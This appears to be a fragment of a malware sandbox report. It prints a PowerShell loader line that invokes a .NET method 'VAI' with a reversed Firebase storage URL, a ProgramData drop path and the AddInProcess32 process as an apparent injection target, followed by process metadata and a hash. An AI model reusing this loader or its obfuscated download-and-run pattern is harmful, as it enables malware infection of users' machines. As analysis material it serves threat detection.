$loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true